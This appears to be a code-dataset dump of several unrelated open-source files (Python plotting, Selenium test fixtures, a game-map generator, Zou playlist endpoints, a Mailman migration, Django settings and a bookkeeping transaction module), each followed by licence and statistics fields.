pgrain.plot(PGRainsort[:,0], lowess(PGRainsort[:,0]+eps, PGRainsort[:,1]+eps, 1/2))
x0, x1 = pgrain.get_xlim()
y0, y1 = pgrain.get_ylim()
pgrain.set_aspect(np.abs((x1-x0)/(y1-y0)))
#PG Plot
pg = fig.add_subplot(221)
pg.plot(timekeep,PG)
pg.set_xlabel("Time (hrs)")
pg.set_xlim(np.min(TimeTip5mm),np.max(TimeTip5mm))
pg.set_ylim(-1050, ylimmax)
pg.invert_yaxis()
#pg.axes.get_yaxis().set_visible(False)
pg.grid()
x0, x1 = pg.get_xlim()
y0, y1 = pg.get_ylim()
pg.set_aspect(np.abs((x1-x0)/(y1-y0)))
#Rain plot
rain = fig.add_subplot(224)
rain.plot(RainRate5mm,TimeTip5mm)
rain.set_ylabel("Time (hrs)")
rain.set_ylim(np.min(TimeTip5mm),np.max(TimeTip5mm))
rain.set_xlim(-.1,xlimmax)
rain.grid()
x0, x1 = rain.get_xlim()
y0, y1 = rain.get_ylim()
rain.set_aspect(np.abs((x1-x0)/(y1-y0)))
#Info Plot
info = fig.add_subplot(223)
info.axis('off')
info.text(-0.1, .9, '$Year and Day$', fontsize=15)
info.text(-0.1, .75, '$P-Value$: ', fontsize=15)
info.text(-0.1, .6, '$R^2$: ', fontsize=15)
info.text(-0.1, .45, "$Pearson's Cor$: ", fontsize=15)
info.text(-0.1, .3, "$Standard Error$: ", fontsize=15)
info.text(-0.1, .15, "$Mann-Whitney$: ", fontsize=15)
info.text(0.6, .9, outFile, fontsize=15)
info.text(0.6, .75, round(p_value,7), fontsize=15)
info.text(0.6, .6, round(r_value**2,5), fontsize=15)
info.text(0.6, .45, round(pearson_cor[1],5), fontsize=15)
info.text(0.6, .3, round(std_err,5), fontsize=15)
info.text(0.6, .15, round(mann_wht,5), fontsize=15)
x0, x1 = info.get_xlim()
y0, y1 = info.get_ylim()
info.set_aspect(np.abs((x1-x0)/(y1-y0)))
plt.tight_layout(pad=0.4, w_pad=-0.5, h_pad=0.5)
plt.savefig('plots/new/' + outFile + "." + fileformat)
plt.close(fig)
def PGRainSlim(xlimmax=None, ylimmax=None, outFile=None, fileformat=None, RainRate5mm=None, PGtip=None, slope=None, intercept=None):
plt.clf()
fig = plt.figure()
#plt.suptitle("Raindrop Charge: " + outFile)
pgrain = fig.add_subplot(111)
pgrain.scatter(RainRate5mm, PGtip)
pgrain.set_xlabel("Rain Rate (mm/hr)")
pgrain.set_ylabel("Potential Gradient (V/m)")
pgrain.grid()
pgrain.set_xlim(-.1,xlimmax)
pgrain.set_ylim(-200, ylimmax)
pgrain.invert_yaxis()
#pgrain.plot(np.arange(-.1, xlimmax+0.3, 0.2),np.arange(-.1, xlimmax+0.3, 0.2)*slope+intercept)
PGRainsort = np.array(sorted(zip(RainRate5mm, PGtip)))
eps = sys.float_info.epsilon
pgrain.plot(PGRainsort[:,0], lowess(PGRainsort[:,0]+eps, PGRainsort[:,1]+eps, 1/2))
x0, x1 = pgrain.get_xlim()
y0, y1 = pgrain.get_ylim()
pgrain.set_aspect(np.abs((x1-x0)/(y1-y0)))
plt.savefig('plots/new/' + outFile + "." + fileformat)
plt.close(fig)
|
gpl-3.0
| -4,713,461,817,470,815,000
| 31.8
| 248
| 0.648374
| false
| 2.397401
| false
| false
| false
|
javierLiarte/tdd-goat-python
|
tests/selenium/conftest.py
|
1
|
1089
|
import pytest
import os
from selenium import webdriver
browsers = {
'firefox': webdriver.Firefox,
'chrome': webdriver.Chrome,
}
@pytest.fixture(scope='session', params=browsers.keys())
def driver(request):
''' driver factory, for allowing more than one browser object in a fixture '''
if 'DISPLAY' not in os.environ:
pytest.skip('Test requires display server (export DISPLAY)')
class DriverFactory(object):
def get(self):
b = browsers[request.param]()
request.addfinalizer(lambda *args: b.quit())
return b
return DriverFactory()
@pytest.fixture
def bf(driver, url):
''' browser factory, for allowing more than one browser object in a fixture '''
class BrowserFactory(object):
def get(self):
b = driver.get()
b.set_window_size(1200, 800)
b.implicitly_wait(3)
b.get(url)
return b
return BrowserFactory()
def pytest_addoption(parser):
parser.addoption('--url', action='store',
default='http://localhost:8111/')
@pytest.fixture(scope='session')
def url(request):
return request.config.option.url
|
gpl-2.0
| -5,603,045,507,090,966,000
| 25.585366
| 81
| 0.68595
| false
| 3.768166
| true
| false
| false
|
zijistark/ck2utils
|
esc/eu4culture_map.py
|
1
|
4853
|
#!/usr/bin/env python3
from collections import defaultdict
import math
from pathlib import Path
import re
import sys
import urllib.request
import numpy as np
from PIL import Image
import spectra
from ck2parser import rootpath, csv_rows, SimpleParser, Obj
from localpaths import eu4dir
from print_time import print_time
@print_time
def main():
parser = SimpleParser()
parser.basedir = eu4dir
if len(sys.argv) > 1:
parser.moddirs.append(Path(sys.argv[1]))
rgb_number_map = {}
default_tree = parser.parse_file('map/default.map')
provinces_path = parser.file('map/' + default_tree['provinces'].val)
climate_path = parser.file('map/' + default_tree['climate'].val)
max_provinces = default_tree['max_provinces'].val
colors = {
'land': np.uint8((127, 127, 127)),
'sea': np.uint8((68, 107, 163)),
'desert': np.uint8((94, 94, 94))
}
prov_color_lut = np.empty(max_provinces, '3u1')
for row in csv_rows(parser.file('map/' + default_tree['definitions'].val)):
try:
number = int(row[0])
except ValueError:
continue
if number < max_provinces:
rgb = tuple(np.uint8(row[1:4]))
rgb_number_map[rgb] = np.uint16(number)
grouped_cultures = []
for _, tree in parser.parse_files('common/cultures/*'):
for n, v in tree:
cultures = []
for n2, v2 in v:
if (isinstance(v2, Obj) and
not re.match(r'((fe)?male|dynasty)_names', n2.val)):
cultures.append(n2.val)
grouped_cultures.append(cultures)
region_colors = []
for _, tree in parser.parse_files('common/region_colors/*'):
for n, v in tree:
region_colors.append(spectra.rgb(*(n2.val / 255 for n2 in v)))
culture_color = {'noculture': colors['land']}
spherical_code = {
1: [(0, 0, 1)],
2: [(0, 0, 1), (0, 0, -1)],
3: [(1, 0, 0), (-1 / 2, math.sqrt(3) / 2, 0),
(-1 / 2, -math.sqrt(3) / 2, 0)]
}
out_of_gamut = 0
for i, cultures in enumerate(grouped_cultures):
group_color = region_colors[i + 1].to('lab').values
num_cultures = len(cultures)
try:
code = spherical_code[num_cultures]
except KeyError:
url_fmt = 'http://neilsloane.com/packings/dim3/pack.3.{}.txt'
url = url_fmt.format(num_cultures)
with urllib.request.urlopen(url) as response:
txt = response.read()
floats = [float(x) for x in txt.split()]
code = list(zip(*[iter(floats)]*3))
spherical_code[num_cultures] = code
for culture, coords in zip(cultures, code):
offset_lab = [a + b * 14 for a, b in zip(group_color, coords)]
color = spectra.lab(*offset_lab)
if color.rgb != color.clamped_rgb:
out_of_gamut += 1
upscaled = [round(x * 255) for x in color.clamped_rgb]
culture_color[culture] = np.uint8(upscaled)
culture_count = sum(len(x) for x in grouped_cultures)
print('Out of gamut: {:.2%}'.format(out_of_gamut / culture_count),
file=sys.stderr)
for path in parser.files('history/provinces/*'):
match = re.match(r'\d+', path.stem)
if not match:
continue
number = int(match.group())
if number >= max_provinces:
continue
properties = {'culture': 'noculture'}
history = defaultdict(list)
for n, v in parser.parse_file(path):
if n.val in properties:
properties[n.val] = v.val
elif isinstance(n.val, tuple) and n.val <= (1444, 11, 11):
history[n.val].extend((n2.val, v2.val) for n2, v2 in v
if n2.val in properties)
properties.update(p2 for _, v in sorted(history.items()) for p2 in v)
prov_color_lut[number] = culture_color[properties['culture']]
for n in parser.parse_file(climate_path)['impassable']:
prov_color_lut[int(n.val)] = colors['desert']
for n in default_tree['sea_starts']:
prov_color_lut[int(n.val)] = colors['sea']
for n in default_tree['lakes']:
prov_color_lut[int(n.val)] = colors['sea']
image = Image.open(str(provinces_path))
a = np.array(image).view('u1,u1,u1')[..., 0]
b = np.vectorize(lambda x: rgb_number_map[tuple(x)], otypes=[np.uint16])(a)
mod = parser.moddirs[0].name.lower() + '_' if parser.moddirs else ''
borders_path = rootpath / (mod + 'eu4borderlayer.png')
borders = Image.open(str(borders_path))
out = Image.fromarray(prov_color_lut[b])
out.paste(borders, mask=borders)
out_path = rootpath / (mod + 'eu4culture_map.png')
out.save(str(out_path))
if __name__ == '__main__':
main()
|
gpl-2.0
| 2,957,810,107,190,530,600
| 37.212598
| 79
| 0.571605
| false
| 3.194865
| false
| false
| false
|
cgwire/zou
|
zou/app/blueprints/playlists/resources.py
|
1
|
9428
|
import slugify
from flask import request, send_file as flask_send_file
from flask_restful import Resource
from flask_jwt_extended import jwt_required
from zou.app import config
from zou.app.mixin import ArgsMixin
from zou.app.utils import permissions
from zou.app.services import (
entities_service,
playlists_service,
persons_service,
preview_files_service,
projects_service,
shots_service,
user_service,
)
from zou.app.stores import file_store, queue_store
from zou.app.utils import fs
from zou.utils.movie import EncodingParameters
class ProjectPlaylistsResource(Resource, ArgsMixin):
"""
Retrieve all playlists related to given project. Result is paginated and
can be sorted.
"""
@jwt_required
def get(self, project_id):
user_service.block_access_to_vendor()
user_service.check_project_access(project_id)
page = self.get_page()
sort_by = self.get_sort_by()
task_type_id = self.get_text_parameter("task_type_id")
return playlists_service.all_playlists_for_project(
project_id,
for_client=permissions.has_client_permissions(),
page=page,
sort_by=sort_by,
task_type_id=task_type_id
)
class EpisodePlaylistsResource(Resource, ArgsMixin):
"""
Retrieve all playlists related to given episode. The full list is returned
because the number of playlists in an episode is not that big.
"""
@jwt_required
def get(self, project_id, episode_id):
user_service.block_access_to_vendor()
user_service.check_project_access(project_id)
sort_by = self.get_sort_by()
task_type_id = self.get_text_parameter("task_type_id")
if episode_id not in ["main", "all"]:
shots_service.get_episode(episode_id)
return playlists_service.all_playlists_for_episode(
project_id,
episode_id,
permissions.has_client_permissions(),
sort_by=sort_by,
task_type_id=task_type_id,
)
class ProjectPlaylistResource(Resource):
@jwt_required
def get(self, project_id, playlist_id):
user_service.block_access_to_vendor()
user_service.check_project_access(project_id)
return playlists_service.get_playlist_with_preview_file_revisions(
playlist_id
)
class EntityPreviewsResource(Resource):
@jwt_required
def get(self, entity_id):
"""
Retrieve all previews related to a given entity. It sends them
]as a dict. Keys are related task type ids and values are arrays
of preview for this task type.
"""
entity = entities_service.get_entity(entity_id)
user_service.check_project_access(entity["project_id"])
return playlists_service.get_preview_files_for_entity(entity_id)
class PlaylistDownloadResource(Resource):
@jwt_required
def get(self, playlist_id, build_job_id):
playlist = playlists_service.get_playlist(playlist_id)
project = projects_service.get_project(playlist["project_id"])
build_job = playlists_service.get_build_job(build_job_id)
user_service.check_project_access(playlist["project_id"])
if build_job["status"] != "succeeded":
return {"error": True, "message": "Build is not finished"}, 400
else:
movie_file_path = fs.get_file_path(
config,
file_store.get_local_movie_path,
file_store.open_movie,
"playlists",
build_job_id,
"mp4",
)
context_name = slugify.slugify(project["name"], separator="_")
if project["production_type"] == "tvshow":
episode_id = playlist["episode_id"]
if episode_id is not None:
episode = shots_service.get_episode(playlist["episode_id"])
episode_name = episode["name"]
elif playlist["is_for_all"]:
episode_name = "all assets"
else:
episode_name = "main pack"
context_name += "_%s" % slugify.slugify(
episode_name, separator="_"
)
attachment_filename = "%s_%s_%s.mp4" % (
slugify.slugify(build_job["created_at"], separator="").replace(
"t", "_"
),
context_name,
slugify.slugify(playlist["name"], separator="_"),
)
return flask_send_file(
movie_file_path,
conditional=True,
mimetype="video/mp4",
as_attachment=True,
attachment_filename=attachment_filename,
)
class BuildPlaylistMovieResource(Resource):
@jwt_required
def get(self, playlist_id):
playlist = playlists_service.get_playlist(playlist_id)
user_service.check_manager_project_access(playlist["project_id"])
project = projects_service.get_project(playlist["project_id"])
(width, height) = preview_files_service.get_preview_file_dimensions(
project
)
fps = preview_files_service.get_preview_file_fps(project)
params = EncodingParameters(width=width, height=height, fps=fps)
shots = [
{"preview_file_id": x.get("preview_file_id")}
for x in playlist["shots"]
]
if config.ENABLE_JOB_QUEUE:
remote = config.ENABLE_JOB_QUEUE_REMOTE
# remote worker can not access files local to the web app
assert not remote or config.FS_BACKEND in ["s3", "swift"]
current_user = persons_service.get_current_user()
queue_store.job_queue.enqueue(
playlists_service.build_playlist_job,
args=(playlist, shots, params, current_user["email"], remote),
job_timeout=3600,
)
return {"job": "running"}
else:
job = playlists_service.build_playlist_movie_file(
playlist, shots, params, remote=False
)
return {"job": job["status"]}
class PlaylistZipDownloadResource(Resource):
@jwt_required
def get(self, playlist_id):
playlist = playlists_service.get_playlist(playlist_id)
project = projects_service.get_project(playlist["project_id"])
user_service.block_access_to_vendor()
user_service.check_playlist_access(playlist)
zip_file_path = playlists_service.build_playlist_zip_file(playlist)
context_name = slugify.slugify(project["name"], separator="_")
if project["production_type"] == "tvshow":
episode_id = playlist["episode_id"]
if episode_id is not None:
episode = shots_service.get_episode(playlist["episode_id"])
episode_name = episode["name"]
elif playlist["is_for_all"]:
episode_name = "all assets"
else:
episode_name = "main pack"
context_name += "_%s" % slugify.slugify(episode_name, separator="_")
attachment_filename = "%s_%s.zip" % (
context_name,
slugify.slugify(playlist["name"], separator="_"),
)
return flask_send_file(
zip_file_path,
conditional=True,
mimetype="application/zip",
as_attachment=True,
attachment_filename=attachment_filename,
)
class BuildJobResource(Resource):
@jwt_required
def get(self, playlist_id, build_job_id):
user_service.block_access_to_vendor()
playlist = playlists_service.get_playlist(playlist_id)
user_service.check_playlist_access(playlist)
return playlists_service.get_build_job(build_job_id)
@jwt_required
def delete(self, playlist_id, build_job_id):
user_service.block_access_to_vendor()
playlist = playlists_service.get_playlist(playlist_id)
user_service.check_playlist_access(playlist)
playlists_service.remove_build_job(playlist, build_job_id)
return "", 204
class ProjectBuildJobsResource(Resource):
"""
Retrieve all build jobs related to given project.
It's mainly used for synchronisation purpose.
"""
@jwt_required
def get(self, project_id):
permissions.check_admin_permissions()
projects_service.get_project(project_id)
return playlists_service.get_build_jobs_for_project(project_id)
class ProjectAllPlaylistsResource(Resource, ArgsMixin):
"""
Retrieve all playlists related to given project.
It's mainly used for synchronisation purpose.
"""
@jwt_required
def get(self, project_id):
permissions.check_admin_permissions()
projects_service.get_project(project_id)
page = self.get_page()
return playlists_service.get_playlists_for_project(project_id, page)
class TempPlaylistResource(Resource, ArgsMixin):
"""
Retrieve all playlists related to given project.
It's mainly used for synchronisation purpose.
"""
@jwt_required
def post(self, project_id):
user_service.check_project_access(project_id)
task_ids = request.json.get("task_ids", [])
return playlists_service.generate_temp_playlist(task_ids) or []
|
agpl-3.0
| 1,423,871,682,942,486,500
| 34.443609
| 80
| 0.609037
| false
| 4.044616
| false
| false
| false
|
trevor/mailman3
|
src/mailman/database/schema/mm_20121015000000.py
|
1
|
3289
|
# Copyright (C) 2012-2014 by the Free Software Foundation, Inc.
#
# This file is part of GNU Mailman.
#
# GNU Mailman is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# GNU Mailman is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# GNU Mailman. If not, see <http://www.gnu.org/licenses/>.
"""3.0b2 -> 3.0b3 schema migrations.
Renamed:
* bans.mailing_list -> bans.list_id
Removed:
* mailinglist.new_member_options
* mailinglist.send_remindersn
"""
from __future__ import absolute_import, print_function, unicode_literals
__metaclass__ = type
__all__ = [
'upgrade',
]
from mailman.database.schema.helpers import make_listid, pivot
VERSION = '20121015000000'
def upgrade(database, store, version, module_path):
if database.TAG == 'sqlite':
upgrade_sqlite(database, store, version, module_path)
else:
upgrade_postgres(database, store, version, module_path)
def upgrade_sqlite(database, store, version, module_path):
database.load_schema(
store, version, 'sqlite_{}_01.sql'.format(version), module_path)
results = store.execute("""
SELECT id, mailing_list
FROM ban;
""")
for id, mailing_list in results:
# Skip global bans since there's nothing to update.
if mailing_list is None:
continue
store.execute("""
UPDATE ban_backup SET list_id = '{}'
WHERE id = {};
""".format(make_listid(mailing_list), id))
# Pivot the bans backup table to the real thing.
pivot(store, 'ban')
pivot(store, 'mailinglist')
def upgrade_postgres(database, store, version, module_path):
# Get the old values from the ban table.
results = store.execute('SELECT id, mailing_list FROM ban;')
store.execute('ALTER TABLE ban ADD COLUMN list_id TEXT;')
for id, mailing_list in results:
# Skip global bans since there's nothing to update.
if mailing_list is None:
continue
store.execute("""
UPDATE ban SET list_id = '{0}'
WHERE id = {1};
""".format(make_listid(mailing_list), id))
store.execute('ALTER TABLE ban DROP COLUMN mailing_list;')
store.execute('ALTER TABLE mailinglist DROP COLUMN new_member_options;')
store.execute('ALTER TABLE mailinglist DROP COLUMN send_reminders;')
store.execute('ALTER TABLE mailinglist DROP COLUMN subscribe_policy;')
store.execute('ALTER TABLE mailinglist DROP COLUMN unsubscribe_policy;')
store.execute(
'ALTER TABLE mailinglist DROP COLUMN subscribe_auto_approval;')
store.execute('ALTER TABLE mailinglist DROP COLUMN private_roster;')
store.execute(
'ALTER TABLE mailinglist DROP COLUMN admin_member_chunksize;')
# Record the migration in the version table.
database.load_schema(store, version, None, module_path)
|
gpl-3.0
| 3,540,926,000,866,135,600
| 32.561224
| 78
| 0.679842
| false
| 3.977025
| false
| false
| false
|
sixam/dw6824
|
src/ui/stroke.py
|
1
|
2694
|
import copy
from PyQt4 import QtCore, QtGui
from utils.utils import Utils
sizeX = 1024
sizeY = 768
class Stroke:
"""Basic Stroke"""
def __init__(self, path=[], width=0, color=[0,0,0,255], id='none'):
self.path = path
self.width = width
self.color = color
if id == 'none':
self.id = Utils.generateID()
else:
self.id = id
def __str__(self):
c = self.getBarycenter()
return "Stroke : %s - [%01.02f,%01.02f] - c: {0} - pts:{1}".format(self.color,len(self.path)) % (self.id[0:5],c[0]/sizeX,c[1]/sizeY)
def __copy__(self):
new = Stroke()
new.path = copy.copy(self.path);
new.width = copy.copy(self.width);
new.color = copy.copy(self.color);
new.id = copy.copy(self.id)
return new
def __cmp__(self, other):
eq = True
if self.path != other.path:
eq = False
if self.width != other.width:
eq = False
if self.color != other.color:
eq = False
if self.id != other.id:
eq = False
b1 = self.getBarycenter()
b2 = other.getBarycenter()
if b1[0]!=b2[0] or b1[1]!=b2[1]:
eq = False
if eq:
return 0
return -1
def marshall(self):
""" Wraps the stroke data into a RPC-friendly format """
packet = {}
packet['path'] = self.path
packet['width'] = self.width
packet['color'] = self.color
packet['id'] = self.id
return packet
def toPainterPath(self):
""" Transform the strokes to a QT line """
points = self.path
path = QtGui.QPainterPath(QtCore.QPointF(*points[0]));
for pt in points:
path.lineTo(QtCore.QPointF(*pt));
return path
def getBarycenter(self):
x = 0
y = 0
n = len(self.path)
if n > 0:
for pt in self.path:
x += pt[0]
y += pt[1]
x /= float(n)
y /= float(n)
return [x,y]
def moveTo(self,newpos):
""" Change the stroke position to the supplied location """
c = self.getBarycenter()
offset = [newpos[0]-c[0],newpos[1]-c[1]]
self.offsetPosBy(offset)
def offsetPosBy(self,offset):
""" Change the stroke position by an offset """
if isinstance(offset,QtCore.QPointF):
x = offset.x()
y = offset.y()
else:
x = offset[0]
y = offset[1]
for i,pt in enumerate(self.path):
pt[0] = pt[0] + x
pt[1] = pt[1] + y
|
bsd-3-clause
| 2,516,270,057,821,345,000
| 27.357895
| 140
| 0.489978
| false
| 3.467181
| false
| false
| false
|
daniyalzade/burgaz
|
settings.py
|
1
|
4442
|
import os
from shopify_settings import *
SITE_ROOT = os.path.dirname(os.path.realpath(__file__))
try:
from djangoappengine.settings_base import *
USING_APP_ENGINE = True
except ImportError:
USING_APP_ENGINE = False
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', '
'NAME': os.path.join(SITE_ROOT, 'db-development.sqlite3'),
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with
'PORT': '', # Set to empty string for default. Not used with sq
}
}
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
os.path.join(SITE_ROOT, 'static'),
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '#w%yp9_5wnupojr=4o0mwap#!)y=q9ovu=o#xnytga7u5^bf27'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.request',
'django.contrib.messages.context_processors.messages',
'shopify_app.context_processors.current_shop',
)
if not USING_APP_ENGINE:
TEMPLATE_CONTEXT_PROCESSORS += (
'django.core.context_processors.static',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'shopify_app.middleware.LoginProtection',
)
ROOT_URLCONF = 'urls'
TEMPLATE_DIRS = (
os.path.join(SITE_ROOT, 'templates'),
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'home',
'shopify_app',
)
if USING_APP_ENGINE:
INSTALLED_APPS += (
'djangoappengine',
'djangotoolbox',
)
else:
INSTALLED_APPS += (
'django.contrib.sites',
'django.contrib.staticfiles',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
mit
| -8,659,885,461,204,517,000
| 30.062937
| 96
| 0.660288
| false
| 3.698585
| false
| false
| false
|
thijsmie/tantalus
|
src/tantalus/logic/transaction.py
|
1
|
9287
|
from tantalus_db.base import db
from tantalus_db.models import Referencing, Transaction, TransactionLine, ServiceLine, Relation, Product, BtwType
from tantalus_db.utility import get_or_none, transactional
from tantalus.logic.rows import transform_collection
from collections import defaultdict
from datetime import datetime
@transactional
def new_transaction(data):
relation = get_or_none(data['relation'], Relation)
if relation is None:
raise Exception("Relation does not exist!")
if relation.numbered_reference:
reference = Referencing.get_reference()
else:
reference = 0
tr = Transaction.query.filter(Transaction.relation == relation).order_by(
Transaction.informal_reference.desc()).first()
if tr is None:
informal_reference = 1
else:
informal_reference = tr.informal_reference + 1
t = Transaction(
reference=reference,
informal_reference=informal_reference,
relation=relation,
deliverydate=datetime.strptime(data["deliverydate"], "%Y-%m-%d").date(),
processeddate=datetime.now().date(),
description=data.get("description", ""),
two_to_one_has_btw=data.get("two_to_one_has_btw", False),
two_to_one_btw_per_row=data.get("two_to_one_btw_per_row", False)
)
for prd in data["sell"]:
product = get_or_none(prd["id"], Product)
if product is None:
raise Exception("Product with id {} does not exist.".format(prd["id"]))
line = product.take(int(prd['amount']))
t.one_to_two.append(line)
for prd in data["buy"]:
product = get_or_none(prd["id"], Product)
if product is None:
raise Exception("Product with id {} does not exist.".format(prd["id"]))
line = TransactionLine(
product=product,
amount=int(prd['amount']),
prevalue=int(prd['price']),
value=product.value * int(prd['amount']),
btwtype=product.btwtype
)
product.give(line)
t.two_to_one.append(line)
for prd in data["service"]:
btw = prd.get('btw', 0)
btwtype = BtwType.query.filter(BtwType.percentage == btw).first()
if btwtype is None:
btwtype = BtwType(
name=str(btw)+"%",
percentage=btw
)
db.session.add(btwtype)
line = ServiceLine(
service=prd['contenttype'],
amount=int(prd['amount']),
value=int(prd['price']),
btwtype=btwtype
)
t.services.append(line)
rec = transaction_record(t)
t.total = rec["total"]
db.session.add(t)
relation.budget -= rec["total"]
return t
@transactional
def edit_transaction(t, data):
# Easy stuff first
old_total = t.total
t.revision += 1
t.two_to_one_has_btw = data.get("two_to_one_has_btw", t.two_to_one_has_btw)
t.two_to_one_btw_per_row = data.get("two_to_one_btw_per_row", t.two_to_one_btw_per_row)
if "deliverydate" in data:
t.deliverydate = datetime.strptime(data["deliverydate"], "%Y-%m-%d").date()
if "description" in data:
t.description = data["description"]
newsell = []
for prd in data["sell"]:
product = get_or_none(prd["id"], Product)
if product is None:
raise Exception("Product with id {} does not exist.".format(prd["id"]))
line = TransactionLine(
value=int(prd['amount'])*product.value,
prevalue=int(prd['amount'])*product.value,
amount=int(prd['amount']),
product=product,
btwtype=product.btwtype
)
newsell.append(line)
t.one_to_two = transform_collection(t.one_to_two, newsell, True)
newbuy = []
for prd in data["buy"]:
product = get_or_none(prd["id"], Product)
if product is None:
raise Exception("Product with id {} does not exist.".format(prd["id"]))
line = TransactionLine(
product=product,
amount=int(prd['amount']),
prevalue=int(prd['price']),
value=int(prd['amount'])*product.value,
btwtype=product.btwtype
)
newbuy.append(line)
t.two_to_one = transform_collection(t.two_to_one, newbuy, False)
t.services = []
for prd in data["service"]:
btw = prd.get('btw', 0)
btwtype = BtwType.query.filter(BtwType.percentage == btw).first()
if btwtype is None:
btwtype = BtwType(
name=str(btw)+"%",
percentage=btw
)
db.session.add(btwtype)
line = ServiceLine(
service=prd['contenttype'],
amount=int(prd['amount']),
value=int(prd['price']),
btwtype=btwtype
)
t.services.append(line)
record = transaction_record(t)
t.total = record["total"]
db.session.add(t)
t.relation.budget += old_total - t.total
return t
def make_row_record(row):
return {
"contenttype": row.product.contenttype,
"group": row.product.group.name,
"prevalue": row.prevalue,
"value": row.value,
"amount": row.amount,
"btw": row.btwtype.percentage
}
def make_service_record(row):
return {
"contenttype": row.service,
"amount": row.amount,
"prevalue": row.value,
"value": row.value,
"btw": row.btwtype.percentage
}
def transaction_process(transaction):
sellrows = [make_row_record(row) for row in transaction.one_to_two]
buyrows = [make_row_record(row) for row in transaction.two_to_one]
servicerows = [make_service_record(row) for row in transaction.services]
btwtotals = defaultdict(float)
btwvalues = defaultdict(int)
# Current total including btw, btw rounded per invoice
for row in sellrows:
btw = row["prevalue"] * row["btw"] / 100. / (row["btw"]/100. + 1)
btwtotals[row["btw"]] -= btw
btwvalues[row["btw"]] -= row["prevalue"]
row["btwvalue"] = btw
# Current total including btw, btw rounded per invoice
for row in servicerows:
btw = row["prevalue"] * row["btw"] / 100. / (row["btw"]/100. + 1)
btwtotals[row["btw"]] -= btw
btwvalues[row["btw"]] -= row["prevalue"]
row["btwvalue"] = btw
buybtwtotals = defaultdict(float)
for row in buyrows:
if transaction.two_to_one_has_btw:
if transaction.two_to_one_btw_per_row:
# Current total including btw, btw rounded per row
btw = round(row["prevalue"] * row["btw"] / 100.0 / (row["btw"]/100. + 1))
else:
# Current total including btw, btw rounded for full invoice
# We should use decimals here, but floats are good enough for now
btw = row["prevalue"] * row["btw"] / 100. / (row["btw"]/100. + 1)
else:
if transaction.two_to_one_btw_per_row:
# Current total excluding btw, btw rounded per row
btw = round(row["prevalue"] * row["btw"] / 100.0)
btwvalues[row["btw"]] += btw
else:
# Current total excluding btw, btw rounded for full invoice
# We should use decimals here, but floats are good enough for now
btw = row["prevalue"] * row["btw"] / 100.0
btwvalues[row["btw"]] += btw
btwvalues[row["btw"]] += row["prevalue"]
btwtotals[row["btw"]] += btw
buybtwtotals[row["btw"]] += btw
row["btwvalue"] = btw
row["value_exl"] = row["value"] * (1 - row["btw"] / 100.0 / (row["btw"]/100. + 1))
for k, v in btwtotals.items():
btwtotals[k] = int(round(v))
return dict(btwtotals), dict(btwvalues), dict(buybtwtotals), sellrows, buyrows, servicerows
def transaction_record(transaction):
btwtotals, btwvalues, buybtwtotals, sellrows, buyrows, servicerows = transaction_process(transaction)
selltotal = sum(r['prevalue'] for r in sellrows)
buytotal = sum(r['prevalue'] for r in buyrows)
servicetotal = sum(r['prevalue'] for r in servicerows)
total = selltotal - buytotal + servicetotal
if not transaction.two_to_one_has_btw:
total -= sum(buybtwtotals.values())
return {
"reference": str(transaction.reference).zfill(4),
"name": transaction.relation.name + " " + str(transaction.informal_reference).zfill(3),
"sell": sellrows,
"buy": buyrows,
"service": servicerows,
"selltotal": selltotal,
"buytotal": buytotal,
"btwtotals": btwtotals,
"btwvalues": btwvalues,
"btwtotal": sum(btwtotals.values()),
"servicetotal": servicetotal,
"description": transaction.description,
"processeddate": transaction.processeddate,
"deliverydate": transaction.deliverydate,
"total": int(total),
"id": transaction.id,
"revision": transaction.revision,
"lastedit": transaction.time_updated,
"two_to_one_has_btw": transaction.two_to_one_has_btw,
"two_to_one_btw_per_row": transaction.two_to_one_btw_per_row
}
|
mit
